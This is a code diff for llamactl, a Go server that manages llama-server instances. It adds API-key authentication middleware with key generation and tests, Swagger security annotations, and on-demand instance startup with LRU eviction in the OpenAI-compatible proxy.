 // @Tags server
+// @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "Version information"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /server/version [get]
-func (h *Handler) VersionHandler() http.HandlerFunc {
+func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		versionCmd := exec.Command("llama-server", "--version")
 		output, err := versionCmd.CombinedOutput()
@@ -67,15 +88,16 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
 	}
 }

-// ListDevicesHandler godoc
+// LlamaServerListDevicesHandler godoc
 // @Summary List available devices for llama server
 // @Description Returns a list of available devices for the llama server
 // @Tags server
+// @Security ApiKeyAuth
 // @Produces text/plain
 // @Success 200 {string} string "List of devices"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /server/devices [get]
-func (h *Handler) ListDevicesHandler() http.HandlerFunc {
+func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
 	return func(w http.ResponseWriter, r *http.Request) {
 		listCmd := exec.Command("llama-server", "--list-devices")
 		output, err := listCmd.CombinedOutput()
@@ -92,8 +114,9 @@ func (h *Handler) ListDevicesHandler() http.HandlerFunc {
 // @Summary List all instances
 // @Description Returns a list of all instances managed by the server
 // @Tags instances
+// @Security ApiKeyAuth
 // @Produces json
-// @Success 200 {array} Instance "List of instances"
+// @Success 200 {array} instance.Process "List of instances"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances [get]
 func (h *Handler) ListInstances() http.HandlerFunc {
@@ -116,11 +139,12 @@ func (h *Handler) ListInstances() http.HandlerFunc {
 // @Summary Create and start a new instance
 // @Description Creates a new instance with the provided configuration options
 // @Tags instances
+// @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Param options body CreateInstanceOptions true "Instance configuration options"
-// @Success 201 {object} Instance "Created instance details"
+// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
+// @Success 201 {object} instance.Process "Created instance details"
 // @Failure 400 {string} string "Invalid request body"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [post]
@@ -132,13 +156,13 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
 		return
 	}

-	var options CreateInstanceOptions
+	var options instance.CreateInstanceOptions
 	if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
 		http.Error(w, "Invalid request body", http.StatusBadRequest)
 		return
 	}

-	instance, err := h.InstanceManager.CreateInstance(name, &options)
+	inst, err := h.InstanceManager.CreateInstance(name, &options)
 	if err != nil {
 		http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
 		return
@@ -146,7 +170,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
 	w.Header().Set("Content-Type", "application/json")
 	w.WriteHeader(http.StatusCreated)

-	if err := json.NewEncoder(w).Encode(instance); err != nil {
+	if err := json.NewEncoder(w).Encode(inst); err != nil {
 		http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}
@@ -157,9 +181,10 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
 // @Summary Get details of a specific instance
 // @Description Returns the details of a specific instance by name
 // @Tags instances
+// @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Success 200 {object} Instance "Instance details"
+// @Success 200 {object} instance.Process "Instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [get]
@@ -171,14 +196,14 @@ func (h *Handler) GetInstance() http.HandlerFunc {
 		return
 	}

-	instance, err := h.InstanceManager.GetInstance(name)
+	inst, err := h.InstanceManager.GetInstance(name)
 	if err != nil {
 		http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}

 	w.Header().Set("Content-Type", "application/json")
-	if err := json.NewEncoder(w).Encode(instance); err != nil {
+	if err := json.NewEncoder(w).Encode(inst); err != nil {
 		http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}
@@ -189,11 +214,12 @@ func (h *Handler) GetInstance() http.HandlerFunc {
 // @Summary Update an instance's configuration
 // @Description Updates the configuration of a specific instance by name
 // @Tags instances
+// @Security ApiKeyAuth
 // @Accept json
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Param options body CreateInstanceOptions true "Instance configuration options"
-// @Success 200 {object} Instance "Updated instance details"
+// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
+// @Success 200 {object} instance.Process "Updated instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name} [put]
@@ -205,20 +231,20 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
 		return
 	}

-	var options CreateInstanceOptions
+	var options instance.CreateInstanceOptions
 	if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
 		http.Error(w, "Invalid request body", http.StatusBadRequest)
 		return
 	}

-	instance, err := h.InstanceManager.UpdateInstance(name, &options)
+	inst, err := h.InstanceManager.UpdateInstance(name, &options)
 	if err != nil {
 		http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}

 	w.Header().Set("Content-Type", "application/json")
-	if err := json.NewEncoder(w).Encode(instance); err != nil {
+	if err := json.NewEncoder(w).Encode(inst); err != nil {
 		http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}
@@ -229,9 +255,10 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
 // @Summary Start a stopped instance
 // @Description Starts a specific instance by name
 // @Tags instances
+// @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Success 200 {object} Instance "Started instance details"
+// @Success 200 {object} instance.Process "Started instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/start [post]
@@ -243,14 +270,20 @@ func (h *Handler) StartInstance() http.HandlerFunc {
 		return
 	}

-	instance, err := h.InstanceManager.StartInstance(name)
+	inst, err := h.InstanceManager.StartInstance(name)
 	if err != nil {
+		// Check if error is due to maximum running instances limit
+		if _, ok := err.(manager.MaxRunningInstancesError); ok {
+			http.Error(w, err.Error(), http.StatusConflict)
+			return
+		}
 		http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}

 	w.Header().Set("Content-Type", "application/json")
-	if err := json.NewEncoder(w).Encode(instance); err != nil {
+	if err := json.NewEncoder(w).Encode(inst); err != nil {
 		http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}
@@ -261,9 +294,10 @@ func (h *Handler) StartInstance() http.HandlerFunc {
 // @Summary Stop a running instance
 // @Description Stops a specific instance by name
 // @Tags instances
+// @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Success 200 {object} Instance "Stopped instance details"
+// @Success 200 {object} instance.Process "Stopped instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/stop [post]
@@ -275,14 +309,14 @@ func (h *Handler) StopInstance() http.HandlerFunc {
 		return
 	}

-	instance, err := h.InstanceManager.StopInstance(name)
+	inst, err := h.InstanceManager.StopInstance(name)
 	if err != nil {
 		http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}

 	w.Header().Set("Content-Type", "application/json")
-	if err := json.NewEncoder(w).Encode(instance); err != nil {
+	if err := json.NewEncoder(w).Encode(inst); err != nil {
 		http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}
@@ -293,9 +327,10 @@ func (h *Handler) StopInstance() http.HandlerFunc {
 // @Summary Restart a running instance
 // @Description Restarts a specific instance by name
 // @Tags instances
+// @Security ApiKeyAuth
 // @Produces json
 // @Param name path string true "Instance Name"
-// @Success 200 {object} Instance "Restarted instance details"
+// @Success 200 {object} instance.Process "Restarted instance details"
 // @Failure 400 {string} string "Invalid name format"
 // @Failure 500 {string} string "Internal Server Error"
 // @Router /instances/{name}/restart [post]
@@ -307,14 +342,14 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
 		return
 	}

-	instance, err := h.InstanceManager.RestartInstance(name)
+	inst, err := h.InstanceManager.RestartInstance(name)
 	if err != nil {
 		http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}

 	w.Header().Set("Content-Type", "application/json")
-	if err := json.NewEncoder(w).Encode(instance); err != nil {
+	if err := json.NewEncoder(w).Encode(inst); err != nil {
 		http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}
@@ -325,6 +360,7 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
 // @Summary Delete an instance
 // @Description Stops and removes a specific instance by name
 // @Tags instances
+// @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Success 204 "No Content"
 // @Failure 400 {string} string "Invalid name format"
@@ -351,6 +387,7 @@ func (h *Handler) DeleteInstance() http.HandlerFunc {
 // @Summary Get logs from a specific instance
 // @Description Returns the logs from a specific instance by name with optional line limit
 // @Tags instances
+// @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Param lines query string false "Number of lines to retrieve (default: all lines)"
 // @Produces text/plain
@@ -377,13 +414,13 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
 		return
 	}

-	instance, err := h.InstanceManager.GetInstance(name)
+	inst, err := h.InstanceManager.GetInstance(name)
 	if err != nil {
 		http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}

-	logs, err := instance.GetLogs(num_lines)
+	logs, err := inst.GetLogs(num_lines)
 	if err != nil {
 		http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
 		return
@@ -398,6 +435,7 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
 // @Summary Proxy requests to a specific instance
 // @Description Forwards HTTP requests to the llama-server instance running on a specific port
 // @Tags instances
+// @Security ApiKeyAuth
 // @Param name path string true "Instance Name"
 // @Success 200 "Request successfully proxied to instance"
 // @Failure 400 {string} string "Invalid name format"
@@ -413,19 +451,19 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
 		return
 	}

-	instance, err := h.InstanceManager.GetInstance(name)
+	inst, err := h.InstanceManager.GetInstance(name)
 	if err != nil {
 		http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 		return
 	}

-	if !instance.Running {
+	if !inst.IsRunning() {
 		http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
 		return
 	}

 	// Get the cached proxy for this instance
-	proxy, err := instance.GetProxy()
+	proxy, err := inst.GetProxy()
 	if err != nil {
 		http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
 		return
@@ -440,6 +478,9 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
 		proxyPath = "/" + proxyPath
 	}

+	// Update the last request time for the instance
+	inst.UpdateLastRequestTime()
+
 	// Modify the request to remove the proxy prefix
 	originalPath := r.URL.Path
 	r.URL.Path = proxyPath
@@ -462,6 +503,7 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
 // @Summary List instances in OpenAI-compatible format
 // @Description Returns a list of instances in a format compatible with OpenAI API
 // @Tags openai
+// @Security ApiKeyAuth
 // @Produces json
 // @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
 // @Failure 500 {string} string "Internal Server Error"
@@ -475,11 +517,11 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
 	}

 	openaiInstances := make([]OpenAIInstance, len(instances))
-	for i, instance := range instances {
+	for i, inst := range instances {
 		openaiInstances[i] = OpenAIInstance{
-			ID:      instance.Name,
+			ID:      inst.Name,
 			Object:  "model",
-			Created: instance.Created,
+			Created: inst.Created,
 			OwnedBy: "llamactl",
 		}
 	}
@@ -499,8 +541,9 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
// OpenAIProxy godoc // OpenAIProxy godoc
// @Summary OpenAI-compatible proxy endpoint // @Summary OpenAI-compatible proxy endpoint
// @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body // @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
// @Tags openai // @Tags openai
// @Security ApiKeyAuth
// @Accept json // @Accept json
// @Produces json // @Produces json
// @Success 200 "OpenAI response" // @Success 200 "OpenAI response"
@@ -530,24 +573,55 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
return return
} }
// Route to the appropriate instance based on model name // Route to the appropriate inst based on model name
instance, err := h.InstanceManager.GetInstance(modelName) inst, err := h.InstanceManager.GetInstance(modelName)
if err != nil { if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return return
} }
if !instance.Running { if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable) allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
return if !allowOnDemand {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
return
}
} else {
http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
return
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
} }
proxy, err := instance.GetProxy() proxy, err := inst.GetProxy()
if err != nil { if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError) http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return return
} }
// Update last request time for the instance
inst.UpdateLastRequestTime()
// Recreate the request body from the bytes we read // Recreate the request body from the bytes we read
r.Body = io.NopCloser(bytes.NewReader(bodyBytes)) r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
r.ContentLength = int64(len(bodyBytes)) r.ContentLength = int64(len(bodyBytes))
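For orientation, here is a minimal client sketch against this proxy. The host, port, instance name, and key are placeholders, not values taken from this commit; the point is that the "model" field in the body selects the llamactl instance, and that the first request to a stopped instance with on-demand start enabled blocks until the instance reports healthy (or the configured timeout expires):

package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
)

func main() {
	// The "model" field selects the llamactl instance by name.
	body := []byte(`{"model": "my-instance", "messages": [{"role": "user", "content": "Hello"}]}`)

	req, err := http.NewRequest("POST", "http://localhost:8080/v1/chat/completions", bytes.NewReader(body))
	if err != nil {
		panic(err)
	}
	req.Header.Set("Content-Type", "application/json")
	// Inference (or management) API key, if inference auth is enabled.
	req.Header.Set("Authorization", "Bearer sk-inference-placeholder")

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	// If the instance was stopped and on-demand start is enabled, this call
	// may take until WaitForHealthy succeeds before a response arrives.
	out, _ := io.ReadAll(resp.Body)
	fmt.Println(resp.Status, string(out))
}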

pkg/server/middleware.go

@@ -0,0 +1,189 @@
package server
import (
"crypto/rand"
"crypto/subtle"
"encoding/hex"
"fmt"
"llamactl/pkg/config"
"log"
"net/http"
"os"
"strings"
)
type KeyType int
const (
KeyTypeInference KeyType = iota
KeyTypeManagement
)
type APIAuthMiddleware struct {
requireInferenceAuth bool
inferenceKeys map[string]bool
requireManagementAuth bool
managementKeys map[string]bool
}
// NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
func NewAPIAuthMiddleware(authCfg config.AuthConfig) *APIAuthMiddleware {
var generated bool = false
inferenceAPIKeys := make(map[string]bool)
managementAPIKeys := make(map[string]bool)
const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
if authCfg.RequireManagementAuth && len(authCfg.ManagementKeys) == 0 {
key := generateAPIKey(KeyTypeManagement)
managementAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Management API Key:\n\n %s\n\n", key)
}
for _, key := range authCfg.ManagementKeys {
managementAPIKeys[key] = true
}
if authCfg.RequireInferenceAuth && len(authCfg.InferenceKeys) == 0 {
key := generateAPIKey(KeyTypeInference)
inferenceAPIKeys[key] = true
generated = true
fmt.Printf("%s\n⚠ INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
fmt.Printf("🔑 Generated Inference API Key:\n\n %s\n\n", key)
}
for _, key := range authCfg.InferenceKeys {
inferenceAPIKeys[key] = true
}
if generated {
fmt.Printf("%s\n⚠ IMPORTANT\n%s\n", banner, banner)
fmt.Println("• These keys are auto-generated and will change on restart")
fmt.Println("• For production, add explicit keys to your configuration")
fmt.Println("• Copy these keys before they disappear from the terminal")
fmt.Println(banner)
}
return &APIAuthMiddleware{
requireInferenceAuth: authCfg.RequireInferenceAuth,
inferenceKeys: inferenceAPIKeys,
requireManagementAuth: authCfg.RequireManagementAuth,
managementKeys: managementAPIKeys,
}
}
// generateAPIKey creates a cryptographically secure API key
func generateAPIKey(keyType KeyType) string {
// Generate 32 random bytes (256 bits)
randomBytes := make([]byte, 32)
var prefix string
switch keyType {
case KeyTypeInference:
prefix = "sk-inference"
case KeyTypeManagement:
prefix = "sk-management"
default:
prefix = "sk-unknown"
}
if _, err := rand.Read(randomBytes); err != nil {
log.Printf("Warning: Failed to generate secure random key, using fallback")
// Fallback to a less secure method if crypto/rand fails
return fmt.Sprintf("%s-fallback-%d", prefix, os.Getpid())
}
// Convert to hex and add prefix
return fmt.Sprintf("%s-%s", prefix, hex.EncodeToString(randomBytes))
}
// AuthMiddleware returns a middleware that checks API keys for the given key type
func (a *APIAuthMiddleware) AuthMiddleware(keyType KeyType) func(http.Handler) http.Handler {
return func(next http.Handler) http.Handler {
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
if r.Method == "OPTIONS" {
next.ServeHTTP(w, r)
return
}
apiKey := a.extractAPIKey(r)
if apiKey == "" {
a.unauthorized(w, "Missing API key")
return
}
var isValid bool
switch keyType {
case KeyTypeInference:
// Management keys also work for OpenAI endpoints (higher privilege)
isValid = a.isValidKey(apiKey, KeyTypeInference) || a.isValidKey(apiKey, KeyTypeManagement)
case KeyTypeManagement:
isValid = a.isValidKey(apiKey, KeyTypeManagement)
default:
isValid = false
}
if !isValid {
a.unauthorized(w, "Invalid API key")
return
}
next.ServeHTTP(w, r)
})
}
}
// extractAPIKey extracts the API key from the request
func (a *APIAuthMiddleware) extractAPIKey(r *http.Request) string {
// Check Authorization header: "Bearer sk-..."
if auth := r.Header.Get("Authorization"); auth != "" {
if after, ok := strings.CutPrefix(auth, "Bearer "); ok {
return after
}
}
// Check X-API-Key header
if apiKey := r.Header.Get("X-API-Key"); apiKey != "" {
return apiKey
}
// Check query parameter
if apiKey := r.URL.Query().Get("api_key"); apiKey != "" {
return apiKey
}
return ""
}
// isValidKey checks if the provided API key is valid for the given key type
func (a *APIAuthMiddleware) isValidKey(providedKey string, keyType KeyType) bool {
var validKeys map[string]bool
switch keyType {
case KeyTypeInference:
validKeys = a.inferenceKeys
case KeyTypeManagement:
validKeys = a.managementKeys
default:
return false
}
for validKey := range validKeys {
if len(providedKey) == len(validKey) &&
subtle.ConstantTimeCompare([]byte(providedKey), []byte(validKey)) == 1 {
return true
}
}
return false
}
// unauthorized sends an unauthorized response
func (a *APIAuthMiddleware) unauthorized(w http.ResponseWriter, message string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(http.StatusUnauthorized)
response := fmt.Sprintf(`{"error": {"message": "%s", "type": "authentication_error"}}`, message)
w.Write([]byte(response))
}
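A sketch of how this middleware composes with a handler, using only the exported pieces shown above (the key value is made up; the middleware accepts it via the Authorization header, the X-API-Key header, or the api_key query parameter):

package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"

	"llamactl/pkg/config"
	"llamactl/pkg/server"
)

func main() {
	auth := server.NewAPIAuthMiddleware(config.AuthConfig{
		RequireManagementAuth: true,
		ManagementKeys:        []string{"sk-management-example"},
	})

	// Wrap a trivial handler with the management-key check.
	protected := auth.AuthMiddleware(server.KeyTypeManagement)(
		http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
			w.WriteHeader(http.StatusOK)
		}),
	)

	req := httptest.NewRequest("GET", "/api/v1/instances", nil)
	req.Header.Set("Authorization", "Bearer sk-management-example")

	rec := httptest.NewRecorder()
	protected.ServeHTTP(rec, req)
	fmt.Println(rec.Code) // 200; without the header it would be 401
}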


@@ -0,0 +1,354 @@
package server_test
import (
"llamactl/pkg/config"
"llamactl/pkg/server"
"net/http"
"net/http/httptest"
"strings"
"testing"
)
func TestAuthMiddleware(t *testing.T) {
tests := []struct {
name string
keyType server.KeyType
inferenceKeys []string
managementKeys []string
requestKey string
method string
expectedStatus int
}{
// Valid key tests
{
name: "valid inference key for inference",
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-valid123",
method: "GET",
expectedStatus: http.StatusOK,
},
{
name: "valid management key for inference", // Management keys work for inference
keyType: server.KeyTypeInference,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
expectedStatus: http.StatusOK,
},
{
name: "valid management key for management",
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-admin123"},
requestKey: "sk-management-admin123",
method: "GET",
expectedStatus: http.StatusOK,
},
// Invalid key tests
{
name: "inference key for management should fail",
keyType: server.KeyTypeManagement,
inferenceKeys: []string{"sk-inference-user123"},
requestKey: "sk-inference-user123",
method: "GET",
expectedStatus: http.StatusUnauthorized,
},
{
name: "invalid inference key",
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "sk-inference-invalid",
method: "GET",
expectedStatus: http.StatusUnauthorized,
},
{
name: "missing inference key",
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "GET",
expectedStatus: http.StatusUnauthorized,
},
{
name: "invalid management key",
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "sk-management-invalid",
method: "GET",
expectedStatus: http.StatusUnauthorized,
},
{
name: "missing management key",
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "GET",
expectedStatus: http.StatusUnauthorized,
},
// OPTIONS requests should always pass
{
name: "OPTIONS request bypasses inference auth",
keyType: server.KeyTypeInference,
inferenceKeys: []string{"sk-inference-valid123"},
requestKey: "",
method: "OPTIONS",
expectedStatus: http.StatusOK,
},
{
name: "OPTIONS request bypasses management auth",
keyType: server.KeyTypeManagement,
managementKeys: []string{"sk-management-valid123"},
requestKey: "",
method: "OPTIONS",
expectedStatus: http.StatusOK,
},
// Cross-key-type validation
{
name: "management key works for inference endpoint",
keyType: server.KeyTypeInference,
inferenceKeys: []string{},
managementKeys: []string{"sk-management-admin"},
requestKey: "sk-management-admin",
method: "POST",
expectedStatus: http.StatusOK,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
cfg := config.AuthConfig{
InferenceKeys: tt.inferenceKeys,
ManagementKeys: tt.managementKeys,
}
middleware := server.NewAPIAuthMiddleware(cfg)
// Create test request
req := httptest.NewRequest(tt.method, "/test", nil)
if tt.requestKey != "" {
req.Header.Set("Authorization", "Bearer "+tt.requestKey)
}
// Create test handler using the appropriate middleware
var handler http.Handler
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
// Execute request
recorder := httptest.NewRecorder()
handler.ServeHTTP(recorder, req)
if recorder.Code != tt.expectedStatus {
t.Errorf("AuthMiddleware() status = %v, expected %v", recorder.Code, tt.expectedStatus)
}
// Check that unauthorized responses have proper format
if recorder.Code == http.StatusUnauthorized {
contentType := recorder.Header().Get("Content-Type")
if contentType != "application/json" {
t.Errorf("Unauthorized response Content-Type = %v, expected application/json", contentType)
}
body := recorder.Body.String()
if !strings.Contains(body, `"type": "authentication_error"`) {
t.Errorf("Unauthorized response missing proper error type: %v", body)
}
}
})
}
}
func TestGenerateAPIKey(t *testing.T) {
tests := []struct {
name string
keyType server.KeyType
}{
{"inference key generation", server.KeyTypeInference},
{"management key generation", server.KeyTypeManagement},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Test auto-generation by creating config that will trigger it
var config config.AuthConfig
if tt.keyType == server.KeyTypeInference {
config.RequireInferenceAuth = true
config.InferenceKeys = []string{} // Empty to trigger generation
} else {
config.RequireManagementAuth = true
config.ManagementKeys = []string{} // Empty to trigger generation
}
// Create middleware - this should trigger key generation
middleware := server.NewAPIAuthMiddleware(config)
// Test that auth is required (meaning a key was generated)
req := httptest.NewRequest("GET", "/", nil)
recorder := httptest.NewRecorder()
var handler http.Handler
if tt.keyType == server.KeyTypeInference {
handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
} else {
handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
}
handler.ServeHTTP(recorder, req)
// Should be unauthorized without a key (proving that a key was generated and auth is working)
if recorder.Code != http.StatusUnauthorized {
t.Errorf("Expected unauthorized without key, got status %v", recorder.Code)
}
// Test uniqueness by creating another middleware instance
middleware2 := server.NewAPIAuthMiddleware(config)
req2 := httptest.NewRequest("GET", "/", nil)
recorder2 := httptest.NewRecorder()
if tt.keyType == server.KeyTypeInference {
handler2 := middleware2.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
} else {
handler2 := middleware2.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler2.ServeHTTP(recorder2, req2)
}
// Both should require auth (proving keys were generated for both instances)
if recorder2.Code != http.StatusUnauthorized {
t.Errorf("Expected unauthorized for second middleware without key, got status %v", recorder2.Code)
}
})
}
}
func TestAutoGeneration(t *testing.T) {
tests := []struct {
name string
requireInference bool
requireManagement bool
providedInference []string
providedManagement []string
shouldGenerateInf bool // Whether inference key should be generated
shouldGenerateMgmt bool // Whether management key should be generated
}{
{
name: "inference auth required, keys provided - no generation",
requireInference: true,
requireManagement: false,
providedInference: []string{"sk-inference-provided"},
providedManagement: []string{},
shouldGenerateInf: false,
shouldGenerateMgmt: false,
},
{
name: "inference auth required, no keys - should auto-generate",
requireInference: true,
requireManagement: false,
providedInference: []string{},
providedManagement: []string{},
shouldGenerateInf: true,
shouldGenerateMgmt: false,
},
{
name: "management auth required, keys provided - no generation",
requireInference: false,
requireManagement: true,
providedInference: []string{},
providedManagement: []string{"sk-management-provided"},
shouldGenerateInf: false,
shouldGenerateMgmt: false,
},
{
name: "management auth required, no keys - should auto-generate",
requireInference: false,
requireManagement: true,
providedInference: []string{},
providedManagement: []string{},
shouldGenerateInf: false,
shouldGenerateMgmt: true,
},
{
name: "both required, both provided - no generation",
requireInference: true,
requireManagement: true,
providedInference: []string{"sk-inference-provided"},
providedManagement: []string{"sk-management-provided"},
shouldGenerateInf: false,
shouldGenerateMgmt: false,
},
{
name: "both required, none provided - should auto-generate both",
requireInference: true,
requireManagement: true,
providedInference: []string{},
providedManagement: []string{},
shouldGenerateInf: true,
shouldGenerateMgmt: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
cfg := config.AuthConfig{
RequireInferenceAuth: tt.requireInference,
RequireManagementAuth: tt.requireManagement,
InferenceKeys: tt.providedInference,
ManagementKeys: tt.providedManagement,
}
middleware := server.NewAPIAuthMiddleware(cfg)
// Test inference behavior if inference auth is required
if tt.requireInference {
req := httptest.NewRequest("GET", "/v1/models", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler.ServeHTTP(recorder, req)
// Should always be unauthorized without a key (since middleware assumes auth is required)
if recorder.Code != http.StatusUnauthorized {
t.Errorf("Expected unauthorized for inference without key, got status %v", recorder.Code)
}
}
// Test management behavior if management auth is required
if tt.requireManagement {
req := httptest.NewRequest("GET", "/api/v1/instances", nil)
recorder := httptest.NewRecorder()
handler := middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusOK)
}))
handler.ServeHTTP(recorder, req)
// Should always be unauthorized without a key (since middleware assumes auth is required)
if recorder.Code != http.StatusUnauthorized {
t.Errorf("Expected unauthorized for management without key, got status %v", recorder.Code)
}
}
})
}
}

